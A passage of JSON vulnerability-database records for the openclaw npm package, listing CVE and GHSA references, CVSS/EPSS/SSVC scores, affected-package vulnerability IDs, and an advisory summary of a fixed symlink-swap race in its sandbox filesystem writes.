                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35656",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35656"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-844j-xrrq-wgh4",
                    "reference_id": "GHSA-844j-xrrq-wgh4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-844j-xrrq-wgh4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35656",
                "GHSA-844j-xrrq-wgh4"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sw3m-5ryw-jbdh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92085?format=api",
            "vulnerability_id": "VCID-t2ve-xemk-mqa9",
            "summary": "OpenClaw: OpenShell FS bridge writes stay pinned to the sandbox mount root\n## Summary\nOpenShell FS bridge writes could be redirected outside the sandbox mount root by a symlink-swap race; the fix keeps them pinned to the mount root.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem writes could let a symlink swap redirect a write outside the intended local mount root.\n\n## Fix\nOpenShell write paths now validate the canonical target against the mount root, reject unsafe symlink parents and symlink leaves for writes, and use root-scoped write helpers before syncing to the remote sandbox.\n\n## Fix Commit(s)\n- 7be82d4fd1193bcb7e44ee38838f00bf924ffa76\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44112",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09643",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09624",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11223",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44112"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44112",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44112"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-in-openshell-fs-bridge-writes",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-in-openshell-fs-bridge-writes"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wppj-c6mr-83jj",
                    "reference_id": "GHSA-wppj-c6mr-83jj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wppj-c6mr-83jj"
                }
            ],
            "fixed_packages": [
                {
